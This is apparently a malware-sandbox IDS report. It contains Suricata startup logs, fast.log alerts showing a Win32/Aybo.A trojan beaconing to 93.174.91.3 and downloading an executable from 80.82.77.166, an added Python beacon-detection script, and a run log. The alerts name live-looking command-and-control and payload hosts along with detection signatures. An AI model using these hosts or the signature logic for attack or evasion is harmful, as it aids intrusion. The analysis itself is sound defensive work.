22/11/2019 -- 13:17:05 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-telnet.rules
22/11/2019 -- 13:17:05 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-exploit.rules
22/11/2019 -- 13:17:05 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-p2p.rules
22/11/2019 -- 13:17:05 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-tftp.rules
22/11/2019 -- 13:17:05 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-mobile_malware.rules
22/11/2019 -- 13:17:07 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-botcc.rules
22/11/2019 -- 13:17:07 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-compromised.rules
22/11/2019 -- 13:17:07 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-drop.rules
22/11/2019 -- 13:17:07 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-dshield.rules
22/11/2019 -- 13:17:07 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-tor.rules
22/11/2019 -- 13:17:07 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-ciarmy.rules
22/11/2019 -- 13:17:07 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/local.rules
22/11/2019 -- 13:17:07 - <Config> - No rules loaded from local.rules.
22/11/2019 -- 13:17:07 - <Info> - 44 rule files processed. 39585 rules successfully loaded, 0 rules failed
22/11/2019 -- 13:17:07 - <Info> - Threshold config parsed: 0 rule(s) found
22/11/2019 -- 13:17:07 - <Perf> - using shared mpm ctx' for tcp-packet
22/11/2019 -- 13:17:07 - <Perf> - using shared mpm ctx' for tcp-stream
22/11/2019 -- 13:17:07 - <Perf> - using shared mpm ctx' for udp-packet
22/11/2019 -- 13:17:07 - <Perf> - using shared mpm ctx' for other-ip
22/11/2019 -- 13:17:07 - <Perf> - using shared mpm ctx' for http_uri
22/11/2019 -- 13:17:07 - <Perf> - using shared mpm ctx' for http_request_line
22/11/2019 -- 13:17:07 - <Perf> - using shared mpm ctx' for http_client_body
22/11/2019 -- 13:17:07 - <Perf> - using shared mpm ctx' for http_response_line
22/11/2019 -- 13:17:07 - <Perf> - using shared mpm ctx' for http_header
22/11/2019 -- 13:17:07 - <Perf> - using shared mpm ctx' for http_header
22/11/2019 -- 13:17:07 - <Perf> - using shared mpm ctx' for http_header_names
22/11/2019 -- 13:17:07 - <Perf> - using shared mpm ctx' for http_header_names
22/11/2019 -- 13:17:07 - <Perf> - using shared mpm ctx' for http_accept
22/11/2019 -- 13:17:07 - <Perf> - using shared mpm ctx' for http_accept_enc
22/11/2019 -- 13:17:07 - <Perf> - using shared mpm ctx' for http_accept_lang
22/11/2019 -- 13:17:07 - <Perf> - using shared mpm ctx' for http_referer
22/11/2019 -- 13:17:07 - <Perf> - using shared mpm ctx' for http_connection
22/11/2019 -- 13:17:07 - <Perf> - using shared mpm ctx' for http_content_len
22/11/2019 -- 13:17:07 - <Perf> - using shared mpm ctx' for http_content_len
22/11/2019 -- 13:17:07 - <Perf> - using shared mpm ctx' for http_content_type
22/11/2019 -- 13:17:07 - <Perf> - using shared mpm ctx' for http_content_type
22/11/2019 -- 13:17:07 - <Perf> - using shared mpm ctx' for http_protocol
22/11/2019 -- 13:17:07 - <Perf> - using shared mpm ctx' for http_protocol
22/11/2019 -- 13:17:07 - <Perf> - using shared mpm ctx' for http_start
22/11/2019 -- 13:17:07 - <Perf> - using shared mpm ctx' for http_start
22/11/2019 -- 13:17:07 - <Perf> - using shared mpm ctx' for http_raw_header
22/11/2019 -- 13:17:07 - <Perf> - using shared mpm ctx' for http_raw_header
22/11/2019 -- 13:17:07 - <Perf> - using shared mpm ctx' for http_method
22/11/2019 -- 13:17:07 - <Perf> - using shared mpm ctx' for http_cookie
22/11/2019 -- 13:17:07 - <Perf> - using shared mpm ctx' for http_cookie
22/11/2019 -- 13:17:07 - <Perf> - using shared mpm ctx' for http_raw_uri
22/11/2019 -- 13:17:07 - <Perf> - using shared mpm ctx' for http_user_agent
22/11/2019 -- 13:17:07 - <Perf> - using shared mpm ctx' for http_host
22/11/2019 -- 13:17:07 - <Perf> - using shared mpm ctx' for http_raw_host
22/11/2019 -- 13:17:07 - <Perf> - using shared mpm ctx' for http_stat_msg
22/11/2019 -- 13:17:07 - <Perf> - using shared mpm ctx' for http_stat_code
22/11/2019 -- 13:17:07 - <Perf> - using shared mpm ctx' for dns_query
22/11/2019 -- 13:17:07 - <Perf> - using shared mpm ctx' for tls_sni
22/11/2019 -- 13:17:07 - <Perf> - using shared mpm ctx' for tls_cert_issuer
22/11/2019 -- 13:17:07 - <Perf> - using shared mpm ctx' for tls_cert_subject
22/11/2019 -- 13:17:07 - <Perf> - using shared mpm ctx' for tls_cert_serial
22/11/2019 -- 13:17:07 - <Perf> - using shared mpm ctx' for dce_stub_data
22/11/2019 -- 13:17:07 - <Perf> - using shared mpm ctx' for dce_stub_data
22/11/2019 -- 13:17:07 - <Perf> - using shared mpm ctx' for ssh_protocol
22/11/2019 -- 13:17:07 - <Perf> - using shared mpm ctx' for ssh_protocol
22/11/2019 -- 13:17:07 - <Perf> - using shared mpm ctx' for ssh_software
22/11/2019 -- 13:17:07 - <Perf> - using shared mpm ctx' for ssh_software
22/11/2019 -- 13:17:07 - <Perf> - using shared mpm ctx' for file_data
22/11/2019 -- 13:17:07 - <Perf> - using shared mpm ctx' for file_data
22/11/2019 -- 13:17:07 - <Perf> - using shared mpm ctx' for http_request_line
22/11/2019 -- 13:17:07 - <Perf> - using shared mpm ctx' for http_response_line
22/11/2019 -- 13:17:08 - <Info> - 39590 signatures processed. 1175 are IP-only rules, 15422 are inspecting packet payload, 27448 inspect application layer, 0 are decoder event only
22/11/2019 -- 13:17:08 - <Config> - building signature grouping structure, stage 1: preprocessing rules... complete
22/11/2019 -- 13:17:08 - <Perf> - TCP toserver: 41 port groups, 37 unique SGH's, 4 copies
22/11/2019 -- 13:17:08 - <Perf> - TCP toclient: 21 port groups, 20 unique SGH's, 1 copies
22/11/2019 -- 13:17:08 - <Perf> - UDP toserver: 41 port groups, 27 unique SGH's, 14 copies
22/11/2019 -- 13:17:08 - <Perf> - UDP toclient: 21 port groups, 17 unique SGH's, 4 copies
22/11/2019 -- 13:17:08 - <Perf> - OTHER toserver: 254 proto groups, 3 unique SGH's, 251 copies
22/11/2019 -- 13:17:08 - <Perf> - OTHER toclient: 254 proto groups, 0 unique SGH's, 254 copies
22/11/2019 -- 13:17:15 - <Perf> - Unique rule groups: 104
22/11/2019 -- 13:17:15 - <Perf> - Builtin MPM "toserver TCP packet": 35
22/11/2019 -- 13:17:15 - <Perf> - Builtin MPM "toclient TCP packet": 17
22/11/2019 -- 13:17:15 - <Perf> - Builtin MPM "toserver TCP stream": 33
22/11/2019 -- 13:17:15 - <Perf> - Builtin MPM "toclient TCP stream": 19
22/11/2019 -- 13:17:15 - <Perf> - Builtin MPM "toserver UDP packet": 27
22/11/2019 -- 13:17:15 - <Perf> - Builtin MPM "toclient UDP packet": 17
22/11/2019 -- 13:17:15 - <Perf> - Builtin MPM "other IP packet": 3
22/11/2019 -- 13:17:15 - <Perf> - AppLayer MPM "toserver http_uri": 14
22/11/2019 -- 13:17:15 - <Perf> - AppLayer MPM "toserver http_request_line": 1
22/11/2019 -- 13:17:15 - <Perf> - AppLayer MPM "toserver http_client_body": 6
22/11/2019 -- 13:17:15 - <Perf> - AppLayer MPM "toclient http_response_line": 1
22/11/2019 -- 13:17:15 - <Perf> - AppLayer MPM "toserver http_header": 10
22/11/2019 -- 13:17:15 - <Perf> - AppLayer MPM "toclient http_header": 6
22/11/2019 -- 13:17:15 - <Perf> - AppLayer MPM "toserver http_header_names": 2
22/11/2019 -- 13:17:15 - <Perf> - AppLayer MPM "toserver http_accept": 1
22/11/2019 -- 13:17:15 - <Perf> - AppLayer MPM "toserver http_referer": 1
22/11/2019 -- 13:17:15 - <Perf> - AppLayer MPM "toserver http_content_len": 1
22/11/2019 -- 13:17:15 - <Perf> - AppLayer MPM "toserver http_content_type": 1
22/11/2019 -- 13:17:15 - <Perf> - AppLayer MPM "toclient http_content_type": 1
22/11/2019 -- 13:17:15 - <Perf> - AppLayer MPM "toserver http_protocol": 1
22/11/2019 -- 13:17:15 - <Perf> - AppLayer MPM "toserver http_start": 1
22/11/2019 -- 13:17:15 - <Perf> - AppLayer MPM "toserver http_raw_header": 1
22/11/2019 -- 13:17:15 - <Perf> - AppLayer MPM "toclient http_raw_header": 1
22/11/2019 -- 13:17:15 - <Perf> - AppLayer MPM "toserver http_method": 5
22/11/2019 -- 13:17:15 - <Perf> - AppLayer MPM "toserver http_cookie": 1
22/11/2019 -- 13:17:15 - <Perf> - AppLayer MPM "toclient http_cookie": 2
22/11/2019 -- 13:17:15 - <Perf> - AppLayer MPM "toserver http_raw_uri": 1
22/11/2019 -- 13:17:15 - <Perf> - AppLayer MPM "toserver http_user_agent": 6
22/11/2019 -- 13:17:15 - <Perf> - AppLayer MPM "toserver http_host": 2
22/11/2019 -- 13:17:15 - <Perf> - AppLayer MPM "toclient http_stat_code": 2
22/11/2019 -- 13:17:15 - <Perf> - AppLayer MPM "toserver dns_query": 4
22/11/2019 -- 13:17:15 - <Perf> - AppLayer MPM "toserver tls_sni": 2
22/11/2019 -- 13:17:15 - <Perf> - AppLayer MPM "toclient tls_cert_issuer": 2
22/11/2019 -- 13:17:15 - <Perf> - AppLayer MPM "toclient tls_cert_subject": 1
22/11/2019 -- 13:17:15 - <Perf> - AppLayer MPM "toclient tls_cert_serial": 1
22/11/2019 -- 13:17:15 - <Perf> - AppLayer MPM "toserver ssh_protocol": 1
22/11/2019 -- 13:17:15 - <Perf> - AppLayer MPM "toserver file_data": 1
22/11/2019 -- 13:17:15 - <Perf> - AppLayer MPM "toclient file_data": 7
22/11/2019 -- 13:17:18 - <Perf> - Registered 39590 rule profiling counters.
22/11/2019 -- 13:17:18 - <Info> - fast output device (regular) initialized: alert
22/11/2019 -- 13:17:18 - <Info> - eve-log output device (regular) initialized: eve.json
22/11/2019 -- 13:17:18 - <Config> - enabling 'eve-log' module 'alert'
22/11/2019 -- 13:17:18 - <Config> - enabling 'eve-log' module 'http'
22/11/2019 -- 13:17:18 - <Config> - enabling 'eve-log' module 'dns'
22/11/2019 -- 13:17:18 - <Config> - enabling 'eve-log' module 'tls'
22/11/2019 -- 13:17:18 - <Config> - enabling 'eve-log' module 'files'
22/11/2019 -- 13:17:18 - <Config> - enabling 'eve-log' module 'ssh'
22/11/2019 -- 13:17:18 - <Info> - Unified2-alert initialized: filename unified2.alert, limit 32 MB
22/11/2019 -- 13:17:18 - <Info> - stats output device (regular) initialized: stats.log
22/



suricata-4.0.0-etpro-all-alert-2019-11-22-T-13-17-20-11222019.1316-75eabd849a48ce317345ba33dfe57943800a1e0e37f64d6e162759b3334180a9_network.pcap.txt - (3544 bytes)
05/03/2017-18:40:34.112005  [**] [1:2806027:3] ETPRO TROJAN Win32/Aybo.A Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.56.19:55948 -> 93.174.91.3:80
05/03/2017-18:40:34.587187  [**] [1:2806027:3] ETPRO TROJAN Win32/Aybo.A Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.56.19:55948 -> 93.174.91.3:80
05/03/2017-18:40:34.815152  [**] [1:2806027:3] ETPRO TROJAN Win32/Aybo.A Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.56.19:55948 -> 93.174.91.3:80
05/03/2017-18:40:54.863994  [**] [1:2806027:3] ETPRO TROJAN Win32/Aybo.A Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.56.19:55948 -> 93.174.91.3:80
05/03/2017-18:41:14.754072  [**] [1:2016141:5] ET INFO Executable Download from dotted-quad Host [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.56.19:55950 -> 80.82.77.166:80
05/03/2017-18:41:14.754072  [**] [1:2020826:7] ET CURRENT_EVENTS Potential Dridex.Maldoc Minimal Executable Request [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.56.19:55950 -> 80.82.77.166:80
05/03/2017-18:41:14.769013  [**] [1:2018959:3] ET POLICY PE EXE or DLL Windows file download HTTP [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 80.82.77.166:80 -> 192.168.56.19:55950
05/03/2017-18:41:14.769013  [**] [1:2021076:2] ET INFO SUSPICIOUS Dotted Quad Host MZ Response [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} 80.82.77.166:80 -> 192.168.56.19:55950
05/03/2017-18:41:14.963605  [**] [1:2806027:3] ETPRO TROJAN Win32/Aybo.A Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.56.19:55948 -> 93.174.91.3:80
05/03/2017-18:42:10.414096  [**] [1:2806027:3] ETPRO TROJAN Win32/Aybo.A Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.56.19:55951 -> 93.174.91.3:80
05/03/2017-18:42:10.983439  [**] [1:2806027:3] ETPRO TROJAN Win32/Aybo.A Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.56.19:55951 -> 93.174.91.3:80
05/03/2017-18:42:30.962161  [**] [1:2806027:3] ETPRO TROJAN Win32/Aybo.A Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.56.19:55951 -> 93.174.91.3:80
05/03/2017-18:42:51.021004  [**] [1:2806027:3] ETPRO TROJAN Win32/Aybo.A Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.56.19:55951 -> 93.174.91.3:80
05/03/2017-18:43:11.079844  [**] [1:2806027:3] ETPRO TROJAN Win32/Aybo.A Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.56.19:55951 -> 93.174.91.3:80
05/03/2017-18:43:31.148676  [**] [1:2806027:3] ETPRO TROJAN Win32/Aybo.A Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.56.19:55951 -> 93.174.91.3:80
05/03/2017-18:43:51.217586  [**] [1:2806027:3] ETPRO TROJAN Win32/Aybo.A Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.56.19:55951 -> 93.174.91.3:80
05/03/2017-18:44:11.386560  [**] [1:2806027:3] ETPRO TROJAN Win32/Aybo.A Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.56.19:55951 -> 93.174.91.3:80
05/03/2017-18:44:31.455417  [**] [1:2806027:3] ETPRO TROJAN Win32/Aybo.A Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.56.19:55951 -> 93.174.91.3:80
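The alert file above shows one signature (sid 2806027, Aybo.A checkin) firing against 93.174.91.3 at a steady cadence, with a separate EXE download from 80.82.77.166 in between. The script below is an added example, not part of this page or of IDSDeathBlossom: it parses Suricata fast.log lines, summarizes hits per signature, and looks for a dominant inter-arrival period per (sid, src, dst, dport) tuple so that a periodic checkin stands out from one-off alerts. The sample input is the alert listing above copied inline; the field names, the 1-second minimum gap and the 60% "share" threshold are choices made here for illustration.

```python
import re
from collections import Counter, defaultdict
from datetime import datetime

# Suricata fast.log line layout:
#   MM/DD/YYYY-HH:MM:SS.usec  [**] [gid:sid:rev] msg [**] [Classification: c] [Priority: p] {PROTO} src:sport -> dst:dport
FAST_RE = re.compile(
    r"^(?P<ts>\d{2}/\d{2}/\d{4}-\d{2}:\d{2}:\d{2}\.\d+)\s+\[\*\*\]\s+"
    r"\[(?P<gid>\d+):(?P<sid>\d+):(?P<rev>\d+)\]\s+(?P<msg>.*?)\s+\[\*\*\]\s+"
    r"\[Classification:\s*(?P<cls>[^\]]*)\]\s+\[Priority:\s*(?P<prio>\d+)\]\s+"
    r"\{(?P<proto>[^}]+)\}\s+(?P<src>[^:]+):(?P<sport>\d+)\s+->\s+(?P<dst>[^:]+):(?P<dport>\d+)\s*$"
)

# Sample input: the 18 alert lines from the fast.log listing on this page, embedded so the script runs offline.
SAMPLE_FAST_LOG = """\
05/03/2017-18:40:34.112005  [**] [1:2806027:3] ETPRO TROJAN Win32/Aybo.A Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.56.19:55948 -> 93.174.91.3:80
05/03/2017-18:40:34.587187  [**] [1:2806027:3] ETPRO TROJAN Win32/Aybo.A Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.56.19:55948 -> 93.174.91.3:80
05/03/2017-18:40:34.815152  [**] [1:2806027:3] ETPRO TROJAN Win32/Aybo.A Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.56.19:55948 -> 93.174.91.3:80
05/03/2017-18:40:54.863994  [**] [1:2806027:3] ETPRO TROJAN Win32/Aybo.A Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.56.19:55948 -> 93.174.91.3:80
05/03/2017-18:41:14.754072  [**] [1:2016141:5] ET INFO Executable Download from dotted-quad Host [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.56.19:55950 -> 80.82.77.166:80
05/03/2017-18:41:14.754072  [**] [1:2020826:7] ET CURRENT_EVENTS Potential Dridex.Maldoc Minimal Executable Request [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.56.19:55950 -> 80.82.77.166:80
05/03/2017-18:41:14.769013  [**] [1:2018959:3] ET POLICY PE EXE or DLL Windows file download HTTP [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 80.82.77.166:80 -> 192.168.56.19:55950
05/03/2017-18:41:14.769013  [**] [1:2021076:2] ET INFO SUSPICIOUS Dotted Quad Host MZ Response [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} 80.82.77.166:80 -> 192.168.56.19:55950
05/03/2017-18:41:14.963605  [**] [1:2806027:3] ETPRO TROJAN Win32/Aybo.A Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.56.19:55948 -> 93.174.91.3:80
05/03/2017-18:42:10.414096  [**] [1:2806027:3] ETPRO TROJAN Win32/Aybo.A Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.56.19:55951 -> 93.174.91.3:80
05/03/2017-18:42:10.983439  [**] [1:2806027:3] ETPRO TROJAN Win32/Aybo.A Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.56.19:55951 -> 93.174.91.3:80
05/03/2017-18:42:30.962161  [**] [1:2806027:3] ETPRO TROJAN Win32/Aybo.A Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.56.19:55951 -> 93.174.91.3:80
05/03/2017-18:42:51.021004  [**] [1:2806027:3] ETPRO TROJAN Win32/Aybo.A Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.56.19:55951 -> 93.174.91.3:80
05/03/2017-18:43:11.079844  [**] [1:2806027:3] ETPRO TROJAN Win32/Aybo.A Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.56.19:55951 -> 93.174.91.3:80
05/03/2017-18:43:31.148676  [**] [1:2806027:3] ETPRO TROJAN Win32/Aybo.A Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.56.19:55951 -> 93.174.91.3:80
05/03/2017-18:43:51.217586  [**] [1:2806027:3] ETPRO TROJAN Win32/Aybo.A Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.56.19:55951 -> 93.174.91.3:80
05/03/2017-18:44:11.386560  [**] [1:2806027:3] ETPRO TROJAN Win32/Aybo.A Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.56.19:55951 -> 93.174.91.3:80
05/03/2017-18:44:31.455417  [**] [1:2806027:3] ETPRO TROJAN Win32/Aybo.A Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.56.19:55951 -> 93.174.91.3:80
"""


def parse_fast_log(text):
    """Parse fast.log text into a list of dicts; lines that do not match the layout are skipped."""
    alerts = []
    for line in text.splitlines():
        m = FAST_RE.match(line.strip())
        if not m:
            continue
        a = m.groupdict()
        a["ts"] = datetime.strptime(a["ts"], "%m/%d/%Y-%H:%M:%S.%f")
        for k in ("gid", "sid", "rev", "prio", "sport", "dport"):
            a[k] = int(a[k])
        alerts.append(a)
    return alerts


def summarize_by_sid(alerts):
    """Hit count and distinct destination IPs per signature id."""
    out = {}
    for a in alerts:
        s = out.setdefault(a["sid"], {"msg": a["msg"], "hits": 0, "dsts": set()})
        s["hits"] += 1
        s["dsts"].add(a["dst"])
    return out


def beacon_candidates(alerts, min_hits=4, min_gap=1.0, min_share=0.6):
    """Find (sid, src, dst, dport) tuples whose alerts recur at a dominant period.

    Gaps shorter than min_gap seconds are discarded first: the sub-second repeats
    inside one connection (retries on the same source port) are not beacon intervals.
    Remaining gaps are rounded to whole seconds; a tuple is reported when the modal
    gap accounts for at least min_share of them. Returns {tuple: (period_s, share)}.
    """
    groups = defaultdict(list)
    for a in alerts:
        groups[(a["sid"], a["src"], a["dst"], a["dport"])].append(a["ts"])
    found = {}
    for key, stamps in groups.items():
        stamps.sort()
        gaps = [(later - earlier).total_seconds() for earlier, later in zip(stamps, stamps[1:])]
        gaps = [g for g in gaps if g >= min_gap]
        if len(gaps) + 1 < min_hits:
            continue
        period, count = Counter(round(g) for g in gaps).most_common(1)[0]
        share = count / len(gaps)
        if share >= min_share:
            found[key] = (period, share)
    return found


if __name__ == "__main__":
    parsed = parse_fast_log(SAMPLE_FAST_LOG)
    for sid, s in sorted(summarize_by_sid(parsed).items()):
        print(f"sid {sid}: {s['hits']} hits, dsts={sorted(s['dsts'])}, msg={s['msg']}")
    for key, (period, share) in beacon_candidates(parsed).items():
        print(f"beacon candidate {key}: ~{period}s period ({share:.0%} of gaps)")
```

On the listing above this reports a single candidate: sid 2806027 from 192.168.56.19 to 93.174.91.3:80 with a period of about 20 seconds, nine of the ten qualifying gaps landing on it (the one 55-second gap is the pause around the executable download). Grouping on destination rather than source port is what joins the two client connections (55948 and 55951) into one series; grouping on the full 4-tuple would split the beacon and hide it.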


IDSDeathBlossom.py.log - (1212 bytes)
2019-11-22 13:16:52,744 - INFO - __init__ - /opt/IDSDeathBlossom/IDSDeathBlossom.py +38 - DBType: MYSQL
2019-11-22 13:16:53,469 - INFO - <module> - /opt/IDSDeathBlossom/IDSDeathBlossom.py +247 - Runmode set to run
2019-11-22 13:16:53,469 - INFO - <module> - /opt/IDSDeathBlossom/IDSDeathBlossom.py +248 - Targets set to suricata-4.0.0-etpro-all
2019-11-22 13:16:53,470 - INFO - run - /opt/IDSDeathBlossom/IDSDeathBlossom.py +320 - looping 1 times in runmode run
2019-11-22 13:16:53,470 - INFO - run - /opt/IDSDeathBlossom/IDSDeathBlossom.py +330 - run with success 0 out of 1
2019-11-22 13:16:53,470 - INFO - execute - /opt/IDSDeathBlossom/IDSDeathBlossom.py +207 - Executing: /opt/suricata400/bin/suricata -c /opt/suricata400/etc/etpro/suricata400-etpro-all.yaml -l /var/www/html/bc723fab22ff6f9155158c04712f3dbe56b33745cb75ec8c950e11a498e082d2 -r /var/pcap/11222019.1316-75eabd849a48ce317345ba33dfe57943800a1e0e37f64d6e162759b3334180a9_network.pcap -vvv -k none
2019-11-22 13:17:20,402 - INFO - run_ids - /opt/IDSDeathBlossom/IDSDeathBlossom.py +244 - suricata ran successfully
2019-11-22 13:17:20,403 - INFO - <module> - /opt/IDSDeathBlossom/IDSDeathBlossom.py +275 - Total time for the idstool 27.6669590473